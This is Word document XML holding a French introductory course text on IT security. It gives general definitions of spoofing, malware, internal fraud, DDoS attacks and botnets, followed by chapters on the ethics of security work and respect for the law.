    <w:p w14:paraId="61C9D8E7" w14:textId="77777777" w:rsidR="00096AD8" w:rsidRDefault="00096AD8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="179308C9" w14:textId="77777777" w:rsidR="00096AD8" w:rsidRDefault="00096AD8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Le spoofing est une technique de cyberattaque où un attaquant falsifie des informations pour se faire passer pour une entité ou une personne de confiance. L'objectif est de tromper la victime pour accéder à des informations sensibles, infiltrer des systèmes ou inciter à des actions malveillantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F0C516" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C5BFAD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68570BCA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ces techniques de cyberattaques exploitent la confiance des individus pour obtenir des informations sensibles ou inciter à des actions nuisibles. Il est crucial pour les organisations de mettre en place des mesures de sécurité robustes et de sensibiliser leurs employés aux risques pour se protéger efficacement contre ces menaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6C2A35" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="469C2DB0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EBFCF4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4353E70B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Types Courants de Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D37900" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD5ACF9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>1. Spoofing d'Email :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03599A3D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Falsification d'adresses email pour envoyer des messages semblant provenir de sources fiables, afin de voler des informations sensibles ou diffuser des logiciels malveillants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7EB81B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B69A226" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>2.Spoofing d'IP :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7E6A70" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Falsification d'adresses IP pour masquer l'origine réelle du trafic, permettant de contourner les mesures de sécurité ou lancer des attaques par déni de service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C63456" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D2A594" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>3.Spoofing de DNS :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6426EC8A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   - Altération des enregistrements DNS pour rediriger le trafic vers des sites web malveillants, trompant ainsi les utilisateurs et les conduisant à divulguer des informations sensibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444D58CD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6654952D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55EBBDFB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Logiciels malveillants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE42FD5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les logiciels malveillants sont des logiciels conçus à des fins de piratage informatique. Il peut s’agir de virus informatiques, de chevaux de Troie, de logiciels espions ou d’autres programmes malveillants. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000BDC91" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62196683" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="037EA682" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2CC66E18" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="537A5048" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1666B187" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7CB53393" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Les fraudes interne est un &lt;&lt;sujet tabou&gt;&gt; pour les entreprises, mais un véritable sujet d’importance ! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E887CB2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6524A0E3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Catégories de fraudeurs : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493D17B4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fraudeur occasionnel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C33C2B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">fraudeur récurrent </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8070D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>personne qui se fait embaucher pour effectuer une fraude</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="160090CF" wp14:editId="2EC00723">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2200275</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>247650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="209550" cy="581025"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="8" name="Flèche vers le bas 8"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2691400" y="707625"/>
                          <a:ext cx="194400" cy="562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ECE4333" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B7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160090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31" type="#_x0000_t67" style="position:absolute;left:0;text-align:left;margin-left:173.25pt;margin-top:19.5pt;width:16.5pt;height:45.75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" adj="17868" fillcolor="#cfe2f3">
                <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short" joinstyle="round"/>
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="2ECE4333" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6357DD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Fraude en groupe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2E8077" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C03447F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2467B24D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392FF8AF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Faiblesse des procédures de contrôle interne et de surveillance des opérations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00641AB5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Gestion permissive des habitations informatique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B615006" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Absence de séparation des tâches et de rotation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F47A77B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="17DE8B30" wp14:editId="4F8E6257">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2257425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>207787</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="209550" cy="581025"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="10" name="Flèche vers le bas 10"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2691400" y="707625"/>
                          <a:ext cx="194400" cy="562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DBEEA71" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B7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 w14:anchorId="17DE8B30" id="Flèche vers le bas 10" o:spid="_x0000_s1032" type="#_x0000_t67" style="position:absolute;left:0;text-align:left;margin-left:177.75pt;margin-top:16.35pt;width:16.5pt;height:45.7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" adj="17868" fillcolor="#cfe2f3">
                <v:stroke startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short" joinstyle="round"/>
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="7DBEEA71" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF115D6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DDFB233" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C400F4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6573D8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Typo des fraudes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A1232" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Le détournement des avoirs de la clientèle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D38AAC8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Le détournement des avoir de l’E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FC915A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>La création de fausses opérations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160FA3F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">La personne qui fausse ses objectifs pour augmenter sa rémunération </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D007A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B82E01" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C97C22" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30ABFECB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Attaques DDOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515A79F0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Une attaque par déni de service distribué (DDoS) est une cyberattaque où plusieurs systèmes compromis (souvent des botnets) inondent la cible (un serveur, un service web ou un réseau) avec un volume massif de trafic, rendant les ressources inaccessibles aux utilisateurs légitimes. L'objectif est de perturber ou d'interrompre le service normal en épuisant les ressources de l'infrastructure cible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1704D9A0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="301D7A6F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75EECDB6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>Illustration d’un réseau de botnets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6556B3B4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un botnet est un ensemble de systèmes contrôlables par un attaquant via des serveurs de commande. Les propriétaires de ces systèmes ne savent pas que leurs PC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>participe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> à un botnet (leur PC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>à</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> été compromise au préalable et à leur insu via l’exploitation d’une vulnérabilité)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A38F282" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05BC3135" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB878C6" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FE1874" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FCC96B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C7FF51" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_8aocjkd74sqt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 3 - L’aspect éthique de la sécurité informatique </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479A910E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0FBB9CA2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2B749E76" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ne pas utiliser de technique malveillante pour accéder à des systèmes informatiques ou à des données. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EFE3C5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1501BA4F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Respecter les lois et les réglementation applicable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5535F2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26038F89" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Respecter la vie privée des utilisateurs </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A62FBE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8275FA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Éviter de causer des dommages ou des perturbations aux systèmes informatiques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF4A54E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36765EA1" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obtenir l’autorisation du propriétaire du système informatique avant d’y accéder </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7619104A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A92E3DD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="303C6E3A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_8ekfes5stmvn" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapitre 4 - Respect des lois lors de l’utilisation d’outils de sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D71DA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E57650" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Définition de la cybercriminalité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Ensemble des actes contrevenants aux traités internationaux ou aux lois nationales utilisant les réseaux ou les systèmes d’information comme moyens de réalisation d’un délit ou d’un crime, ou les ayant pour cible. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF8A4CA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D6CF64" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
